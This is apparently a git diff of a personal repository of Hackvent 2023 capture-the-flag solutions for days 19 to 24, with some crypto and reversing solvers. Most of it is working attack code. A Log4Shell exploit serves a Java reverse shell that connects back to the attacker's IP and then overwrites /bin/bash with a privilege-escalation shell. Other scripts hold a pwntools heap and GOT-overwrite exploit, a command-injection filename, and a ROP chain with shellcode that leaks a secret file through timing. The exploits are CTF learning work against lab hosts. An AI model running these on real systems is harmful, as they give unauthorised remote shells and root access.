:101D26002F0430130A59332E3C11255A23010D1066
:101D3600515833033058262D0210263D2301273EE5
:101D460024113303245A272D2702272E381E330346
:101D5600301024042705262D2305262D285C262E43
:101D66002F01242D245D255B011F0B3E3F5A0B5A84
:101D7600231B25073B5D0D2A281D3D10281D20210C
:101D86001E0E30042F13082806544957490D081D06
:101D9600080000000098048204B904AE040005BEE1
:101DA60004DC0400000000C301FB02C002E60100DF
:101DB60000000046051A05020601060D0A005363D7
:101DC600686564756C6564206163746976617469BD
:101DD6006F6E20696E200020686F757273005275F1
:101DE6006E6E696E67207061796C6F61642E2E2E3F
:101DF600204E6576657220676F6E6E612067697624
:101E06006520796F75207570206274770062617342
:101E1600653634202D642064617461203E2064613F
:101E260074615F6465636F646564006261736820F2
:0E1E3600646174615F6465636F6465640000DD
:00000001FF

1
Day 19/.gitattributes vendored Normal file

@ -0,0 +1 @@
marshalsec-0.0.3-SNAPSHOT-all.jar filter=lfs diff=lfs merge=lfs -text

173
Day 19/exploit.py Normal file

@ -0,0 +1,173 @@
#!/usr/bin/env python
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
# https://git.romanh.de/Roman/HackingScripts
import os
import io
import re
import sys
import json
import time
import base64
import requests
import subprocess
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, rev_shell
from hackingscripts.fileserver import HttpFileServer
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import signal
import threading
IP_ADDRESS = util.get_address()
BASE_URL = "https://7e11237e-9c61-46e2-92ca-cf53299a0447.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
def request(method, uri, **kwargs):
if not uri.startswith("/") and uri != "":
uri = "/" + uri
client = requests
if "session" in kwargs:
client = kwargs["session"]
del kwargs["session"]
if "allow_redirects" not in kwargs:
kwargs["allow_redirects"] = False
if "verify" not in kwargs:
kwargs["verify"] = False
if "proxies" not in kwargs:
kwargs["proxies"] = PROXIES
url = BASE_URL + uri
return client.request(method, url, **kwargs)
def compile_java(shell_port):
java_code = f"""
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {{
public Exploit() throws Exception {{
String host = "{IP_ADDRESS}";
int port = {shell_port};
String cmd = "/bin/sh";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host,port);
InputStream pi=p.getInputStream(),
pe = p.getErrorStream(),
si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {{
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {{
p.exitValue();
break;
}} catch (Exception e) {{
}}
}}
p.destroy();
s.close();
}}
}}
"""
with open("Exploit.java", "w") as f:
f.write(java_code)
subprocess.run(["javac", "Exploit.java"])
with open("Exploit.class", "rb") as f:
java_class = f.read()
os.remove("Exploit.java")
os.remove("Exploit.class")
return java_class
def send_message(msg):
json_data = { "name": "", "message": msg }
res = request("POST", "/up/sendmessage", json=json_data)
util.assert_status_code(res, 200)
def get_privesc_code():
c_code = b"""#include <stdio.h>
#include <unistd.h>
int main() {
printf(\"Spawning a shell with -p parameter...\");
char *shell = \"/bin/sh\";
char *args[] = {shell, \"-p\", NULL};
execve(shell, args, NULL);
return 0;
}
"""
return base64.b64encode(c_code).decode()
if __name__ == "__main__":
http_Port = 8000
shell_port = 9001
java_payload = compile_java(shell_port)
file_server = HttpFileServer("0.0.0.0", http_Port)
file_server.addFile("Exploit.class", java_payload)
file_server.enableLogging()
file_server.startBackground()
payload = f"${{jndi:ldap://{IP_ADDRESS}:1389/b}}"
payload_url = file_server.get_full_url("#Exploit", ip_addr=IP_ADDRESS)
ldap_process = None
def spawn_ldap_server():
global ldap_process
ldap_process = subprocess.Popen([
"java",
"-cp",
os.path.join("marshalsec-0.0.3-SNAPSHOT-all.jar"),
"marshalsec.jndi.LDAPRefServer",
payload_url
])
ldap_process.wait()
print("[ ] Starting LDAP Server")
ldap_thread = threading.Thread(target=spawn_ldap_server)
ldap_thread.start()
print("[ ] Triggering log4j shell")
shell = rev_shell.trigger_background_shell(lambda: send_message(payload), shell_port)
shell.os = "unix"
print("[+] Got shell!")
privesc = get_privesc_code()
commands = [
f"echo {privesc} | base64 -d > /tmp/shell.c && gcc /tmp/shell.c -o /bin/bash",
"/santas-workshop/tool",
"s",
"cat /home/santa/flag.txt",
"exit"
]
for cmd in commands:
shell.sendline(cmd)
time.sleep(0.5)
print("[+] Flag:", shell.raw_output.decode())
shell.close()
print("[ ] Stopping listeners...")
file_server.stop()
ldap_process.send_signal(signal.SIGINT)
ldap_thread.join()

51
Day 19/machine Normal file

@ -0,0 +1,51 @@
Host: 3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Jetty 9.4.26v20200117
|_http-title: Did not follow redirect to https://3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land:443/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
443/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| ssl-cert: Subject: commonName=*.idocker.vuln.land
| Subject Alternative Name: DNS:*.idocker.vuln.land, DNS:idocker.vuln.land
| Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-04T00:00:00
| Not valid after: 2024-09-08T23:59:59
| MD5: 80d7:8bfe:9544:857d:d5ab:3419:4283:4228
|_SHA-1: 7a7c:1086:65bb:52dd:6c97:238f:a29d:c680:1b8b:5a73
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Jetty(9.4.26.v20200117)
|_http-title: Minecraft Dynamic Map
| http-robots.txt: 5 disallowed entries
|_/tiles/ /js/ /standalone/ /images/ /css/
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest, GetRequest, HTTPOptions:
| HTTP/1.0 401 Unauthorized
| Content-Type: text/plain
| Www-Authenticate: Basic realm="traefik"
| Date: Mon, 18 Dec 2023 23:25:56 GMT
| Content-Length: 17
| Unauthorized
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request
|_http-title: Site doesn't have a title (text/plain).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=traefik
9100/tcp open jetdirect?
42810/tcp open fmproduct 1-4 (RPC #1073741824)
55555/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:4f659fe73986787da27462f9cd2bf36603b47ceaa38b072338c369abdc2e1bd7
size 42565306

10
Day 21/Dockerfile Normal file

@ -0,0 +1,10 @@
FROM docker.io/library/ubuntu:23.04
RUN apt update && apt -y upgrade curl python3 gdb binutils elfutils file && bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
RUN apt install -y socat
COPY . .
RUN chmod +x vuln
ENTRYPOINT ["socat", "TCP-LISTEN:1337,reuseaddr,fork", "EXEC:\"./vuln\""]

198
Day 21/exploit.py Executable file

@ -0,0 +1,198 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template '--host=152.96.15.5' '--port=1337' vuln
from pwn import *
from hackingscripts import util
from pyzbar.pyzbar import decode
from PIL import Image
import re
# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or 'vuln')
libc = ELF("./libc.so.6", checksec=False)
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or '152.96.15.5'
port = int(args.PORT or 1337)
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])'.encode())
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
def save_shopping_list(file_name):
if isinstance(file_name, str):
file_name = file_name.encode()
io.recvuntil(b"> ")
io.sendline(b"s")
io.recvuntil(b"> ")
io.sendline(file_name)
def add_item(item_name, item_count):
if isinstance(item_name, str):
item_name = item_name.encode()
io.recvuntil(b"> ")
io.sendline(b"a")
io.recvuntil(b"> ")
io.sendline(item_name)
io.recvuntil(b"> ")
io.sendline(str(item_count).encode())
def send_quit():
io.recvuntil(b"> ")
io.sendline(b"q")
def change_quantity(item_name, new_quantity):
io.recvuntil(b"> ")
io.sendline(b"c")
if isinstance(item_name, str):
item_name = item_name.encode()
io.recvuntil(b"> ")
io.sendline(item_name)
io.recvuntil(b"> ")
io.sendline(str(new_quantity).encode())
leak = io.recvline()
match = re.search(r"You've found my little secret, as a reward you will get: (.*)", leak.decode())
return int(match[1], 16)
def edit_item(item_name, new_name):
if isinstance(item_name, str):
item_name = item_name.encode()
if isinstance(new_name, str):
new_name = new_name.encode()
io.recvuntil(b"> ")
io.sendline(b"e")
io.recvuntil(b"> ")
io.sendline(item_name)
io.recvuntil(b"> ")
io.sendline(new_name)
def list_items():
io.recvuntil(b"> ")
io.sendline(b"l")
items = []
while True:
line = ansi_escape.sub(b'', io.recvline())
match = re.match(r" - (\d+)x (.*)".encode(), line)
if match:
items.append((int(match[1]), match[2]))
elif b"What do you want to do?" in line:
break
return items
def unicode_to_img(unicode):
lines = unicode.split(b"\n")
qr_size = len(lines) * 2 - 1
pix_size = 10
img = Image.new("RGB", (qr_size*pix_size, qr_size*pix_size))
pix = img.load()
color_map = {
"": [(0, 0, 0), (0, 0, 0)],
"": [(0, 0, 0), (255, 255, 255)],
"": [(255, 255, 255), (0, 0, 0)],
" ": [(255, 255, 255), (255, 255, 255)],
"\xa0": [(255, 255, 255), (255, 255, 255)],
}
for ri, line in enumerate(lines):
for ci, b in enumerate(line.decode()):
color_top, color_bottom = color_map[b]
for xi in range(pix_size):
for yi in range(pix_size):
pix[ci*pix_size+yi,ri*2*pix_size+xi] = color_top
if ri < len(lines) - 1:
pix[ci*pix_size+yi,ri*2*pix_size+pix_size+xi] = color_bottom
return img
io = start()
secret_name = "a"*1337
add_item(secret_name, 1)
leak = change_quantity(secret_name, 2)
print("[+] Got leak:", hex(leak))
exe.address = leak - exe.symbols["win"]
print("[+] PIE base:", hex(exe.address))
add_item("AAAA", 1000)
add_item("BBBB", 1000)
edit_item("BBBB", 0x80 * b"B" + p64(exe.got["puts"]))
items = list_items()
heap_leak = u64(util.pad(items[-1][1], 8))
libc.address = heap_leak - libc.symbols["puts"]
print("[+] LIBC base:", hex(libc.address))
edit_item("AAAA", (0x80 + 0x80) * b"A" + p64(libc.address + 0x1f60a8))
items = list_items()
strchrnul_func = u64(util.pad(items[-1][1], 8))
print('[+] strchrnul@plt:', hex(strchrnul_func))
edit_item(p64(strchrnul_func), p64(exe.symbols["win"]))
io.recvuntil(b"[q]uit\n")
io.sendline(b"cat /flag && exit")
qr_code = io.recvall()
io.close()
img = unicode_to_img(qr_code)
print("[+] Flag:", decode(img)[0].data.decode())
### Unintended solution:
# io = start()
# add_item("$(cp /bin/sh vuln)", 1)
# save_shopping_list("vuln")
# send_quit()
# io.close()
# io = start()
# io.close()
# io = start()
# io.interactive()
###

BIN
Day 21/libc.so.6 Normal file

Binary file not shown.

BIN
Day 21/vuln Executable file

Binary file not shown.

14
Day 22/Dockerfile Executable file

@ -0,0 +1,14 @@
FROM ubuntu:22.04
RUN apt-get update -y && apt-get install -y socat
RUN useradd -d /home/santa/ -m -p santa -s /bin/bash santa
RUN echo "santa:santa" | chpasswd
WORKDIR /home/santa
COPY ./pwn .
COPY ./secret.txt .
USER santa
CMD socat TCP-LISTEN:1337,fork,reuseaddr EXEC:'./pwn',raw,pty,echo=0,stderr

174
Day 22/exploit.py Executable file

@ -0,0 +1,174 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./pwn '--host=93feafcd-9de7-4c80-914c-1110f8a36326.rdocker.vuln.land' '--port=1337'
from pwn import *
import string
# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or './pwn')
# libc = ELF("/usr/lib/libc.so.6" if args.LOCAL else "./libc.so.6", checksec=False)
libc = ELF("/usr/lib/libc.so.6" if args.LOCAL else "./libc.so.6", checksec=False)
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or '1a889c42-b594-4c56-8b79-ac7e45ede7b4.rdocker.vuln.land'
port = int(args.PORT or 1337)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
orig_libc_start_main = libc.symbols["__libc_start_main"]
orig_main = exe.symbols["main"]
def try_char(offset, char):
try:
io = start()
io.recvuntil(b"Who should the gifts be for? ")
io.sendline(b"%43$p|%45$p|%47$p")
leak = io.recvline().decode()
match = re.match(r"Processing the wishes of (.*)\|(.*)\|(.*)\n", leak)
stack_canary = int(match[1], 16)
libc_leak = int(match[2], 16)
libc.address = libc_leak - orig_libc_start_main + 48
pie_leak = int(match[3], 16)
exe.address = pie_leak - orig_main
# print("[+] Got stack canary:", hex(stack_canary))
# print("[+] LIBC base:", hex(libc.address))
# print("[+] PIE base:", hex(exe.address))
rop = ROP([libc, exe])
payload = b""
payload += 264 * b"A"
payload += p64(stack_canary)
assert len(payload) <= 0x200
assert b"\n" not in payload
file_name = next(exe.search(b"secret.txt"))
data_segment = exe.address + 0x4000
new_segment = exe.address + 0x6000
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
ret = rop.find_gadget(['ret'])
rop.raw(ret)
rop.raw(pop_rcx_ret)
rop.raw(32)
rop.raw(pop_rdi_ret)
rop.raw(exe.symbols["gifts"])
# (0xffffffffffffffff << 32) & 0xfff == 0
if args.LOCAL:
rop.raw(libc.address + 0x501f9) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
else:
rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
rop.read(0, new_segment, 100)
rop.call(new_segment)
payload += rop.chain()
gifts = [payload, b"a", b"b", b"c", b"d"]
for g in gifts:
io.recvuntil(b"Name a wish: ")
io.sendline(g)
io.sendline(asm(f"""
mov rdi, {hex(file_name)}
xor rsi, rsi
xor rdx, rdx
mov rax, 2
syscall
mov rdi, rax
mov rsi, {hex(data_segment)}
mov rdx, 0x30
xor rax, rax
syscall
mov rsi, {hex(data_segment)}
add rsi, {offset}
xor rax, rax
mov al, {hex(ord(char))}
mov bl, [rsi]
cmp al, bl
je L2
jmp done
L2:
nop
jmp L2
done:
nop
"""))
except Exception as e:
if isinstance(e, KeyboardInterrupt):
exit(0)
io.close()
return try_char(offset, char)
t1 = time.time()
io.recvall(timeout=1.5)
t2 = time.time()
found = t2 - t1 >= 1.5
io.close()
return found
# flag = "HV23{t1m3_b4s3d_s3cr3t_exf1ltr4t10n}"
flag = ""
OFFSET = len(flag)
while True:
found = False
for CHAR in string.printable:
if try_char(OFFSET, CHAR):
flag += CHAR
print("FOUND:", flag)
found = True
break
if found:
OFFSET += 1
continue
else:
print("END")
break

BIN
Day 22/libc.so.6 Executable file

Binary file not shown.

BIN
Day 22/public.tar.xz Normal file

Binary file not shown.

BIN
Day 22/pwn Executable file

Binary file not shown.

1
Day 22/secret.txt Executable file

@ -0,0 +1 @@
HV23{FAKE}

59
Day 23/decrypt.sage Normal file

@ -0,0 +1,59 @@
import re
import random
from Crypto.Util.number import long_to_bytes
values = {}
with open("output.txt", "r") as f:
lines = f.read().split("\n")
values["sum"] = int(lines[0])
for line in lines[1:]:
match = re.match(r"(\w+)=(-?[0-9]+)", line)
values[match[1]] = int(match[2])
for y in range(0, 1000+1):
random.seed(y)
grade = random.choice([2,3])
a = random.randint(9999, 999999)
b = random.randint(8888, 888888)
c = random.randint(7777, 777777)
if a + b + c == values["sum"]:
print("[+] Found y:", y)
break
print("[+] a:", a)
print("[+] b:", b)
print("[+] c:", c)
print("[+] grade:", grade)
x = var("x", domain="integer")
if grade == 2:
y_x = a*x**2+b*x+c
if grade == 3:
d = random.randint(6666, 666666)
y_x = a*x**3+b*x**2+c*x+d
print("[+] d:", d)
print("[+] polynome:", y_x)
N = values["N"]
hint = values["hint"]
p = None
q = var("q")
for x in range(0,1000+1):
eq = (N/q)^3 - q^8 + y_x(x=x) == hint
solution = solve(eq, q, solution_dict=True)
if solution and q in solution[0]:
print("[+] Found x:", x)
q = int(solution[0][q])
p = N//q
break
if p is None:
print("[-] Could not find p and q")
exit()
phi_n = (p - 1) * (q - 1)
d = pow(values["e"], -1, phi_n)
pt = pow(values["encrypted"], d, values["N"])
flag = long_to_bytes(pt).decode()
print("[+] Flag:", flag)

41
Day 23/enc.py Normal file

@ -0,0 +1,41 @@
from Crypto.Util.number import *
from sage.all import *
from secret import FLAG, x, y
import random
# D = {x∈ | 0 ≤ x ≤ 1000}
# D = {y∈ | 0 ≤ y ≤ 1000}
def enc(flag, polynomial_function):
p = getStrongPrime(512)
q = getStrongPrime(512)
N = p * q
e = 65537
hint = p**3 - q**8 + polynomial_function(x=x)
encrypted = pow(bytes_to_long(flag), e, N)
print(f"{N=}")
print(f"{e=}")
print(f"{hint=}")
print(f"{encrypted=}")
def generate_polynomial_function(seed):
x = SR.var("x")
random.seed(seed)
grade = random.choice([2,3])
a = random.randint(9999, 999999)
b = random.randint(8888, 888888)
c = random.randint(7777, 777777)
if grade == 2:
y_x = a*x**2+b*x+c
if grade == 3:
d = random.randint(6666, 666666)
y_x = a*x**3+b*x**2+c*x+d
print(a+b+c)
return y_x
y_x = generate_polynomial_function(y)
enc(FLAG.encode(), y_x)

5
Day 23/output.txt Normal file

@ -0,0 +1,5 @@
1709262
N=143306145185651132108707685748692789834391223254420921250753369412889732941905250889012412570851623535344424483564532684976892052830348014035303355261052741504390590825455129003262581199117432362073303998908141781601553213103109295898711066542593102305069363965164592663322089299134520383469241654273153506653
e=65537
hint=-367367861727692900288480576510727681065028599304486950529865504611346573250755811691725216308460956865709134086848666413510519469962840879406666853346027105744846872125225171429488388383598931153062856414870036460329519241754646669265989077569377130467115317299086371406081342249967666782962173513369856861858058676451390037278311316937161756731165929187543148639994660265783994439168583858109082136915810219786390452412584110468513829455001689531028969430907046738225668834761412112885772525079903072777443223873041260072918891696459905352737195384116938142788776947705026132197185926344278041831047013477983297898344933372775972141179163010102537733004410775357501267841845321271140399200044741656474378808452920297777911527159803159582800816951547394087190043792625664885536154225227819735800442814065528155407746556297892931242208688533313054308779657788077807340045465701247210553988059519291363634253248268722975827616752514688291723712069675405995149499947239454505797412122124933836396842943540518521648803348207619354854290787969076059265170474203200482079680136404766877617679652611682327535174212016390608658107555103054183393719700027186913354158961245998591486268846852581402900857595817303811471853325463202817521164757
encrypted=72792762778232160989381071629769766489971170790967414271032682193723004039685063639675377805724567838635943988752706743932748347933013530918279285456553768626331874756049006544553546268049053833014940495217179504587162478219970564159885619559723778613379425375733026859684952880028997538045791748027936366062

BIN
Day 23/roll-rsa.zip Normal file

Binary file not shown.

BIN
Day 24/HV23 Executable file

Binary file not shown.

95
Day 24/decode.py Normal file

@ -0,0 +1,95 @@
import struct
from hackingscripts import util
from PIL import Image
from pyzbar.pyzbar import decode
def bit_stream_to_qr(bit_stream, qr_size=(29, 32), pix_size=10):
img = Image.new("RGB", (qr_size[1] * pix_size, qr_size[0] * pix_size))
pix = img.load()
columns = ["" for r in range(qr_size[1])]
for i, b in enumerate(bit_stream):
columns[i % qr_size[1]] += b
for ci, column in enumerate(columns):
for ri, b in enumerate(column):
color = (0,0,0) if b == "1" else (255,255,255)
for xi in range(pix_size):
for yi in range(pix_size):
pix[ci*pix_size+xi,ri*pix_size+yi] = color
return img
def apply_scramble(data, loop_count, shift_direction, shift_type_1, shift_type_2):
for i in range(loop_count):
if shift_direction == 0:
if shift_type_1 != -1:
offset = 0x70 + shift_type_1
value = data[offset]
for x in range(0x1c+1):
data[offset] = data[offset - 4]
offset -= 4
data[offset + 4] = value
if shift_type_2 != -1:
offset = shift_type_2 * 4
value = data[offset]
for x in range(3+1):
data[offset] = data[offset + 1]
offset += 1
data[offset - 1] = value
elif shift_direction == 1:
if shift_type_2 != -1:
offset = 3 + shift_type_2 * 4
value = data[offset]
for x in range(3+1):
data[offset] = data[offset - 1]
offset -= 1
data[offset + 1] = value
if shift_type_1 != -1:
offset = shift_type_1
value = data[offset]
for x in range(0x1c + 1):
data[offset] = data[offset + 4]
offset += 4
data[offset - 4] = value
else:
raise
return data
def bytes_to_bit_stream(data, qr_size=(29, 32)):
bit_stream = ""
for v in data:
bit_stream += util.lpad(bin(v)[2:], 8, "0")
bit_stream = bit_stream[0:qr_size[0] * qr_size[1]]
return bit_stream
if __name__ == "__main__":
with open("HV23", "rb") as f:
prog_data = f.read()
QR_DATA = bytearray(prog_data[0x8a3e:0x8a3e+0x70+7])
SCRAMBLE_DATA = prog_data[0x628:0x628+0x60]
NUM_SCRAMBLES = 0x18
assert len(SCRAMBLE_DATA) == NUM_SCRAMBLES * 4
scrambles = []
for scramble in range(0, NUM_SCRAMBLES*4, 4):
scramble_data = SCRAMBLE_DATA[scramble:scramble+4]
shift_type_2, shift_type_1, loop_count, shift_direction = struct.unpack("bbBB", scramble_data)
scrambles.append((loop_count, shift_direction, shift_type_1, shift_type_2))
data = QR_DATA
while True:
for scramble in scrambles:
data = apply_scramble(data, *scramble)
bit_stream = bytes_to_bit_stream(data)
# last 3 columns are all white? we might have a valid QR-code
if all(bit_stream[row*32+29:row*32+32] == "000" for row in range(29)):
img = bit_stream_to_qr(bit_stream)
decoded_objects = decode(img)
if decoded_objects:
img.save(f"qr_code.png")
print("[+] Flag:", decoded_objects[0].data.decode())
exit()

BIN
Day 24/qr_code.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

1
Day 24/s/STARTUP-SEQUENCE Executable file

@ -0,0 +1 @@
sys:HV23

Binary file not shown.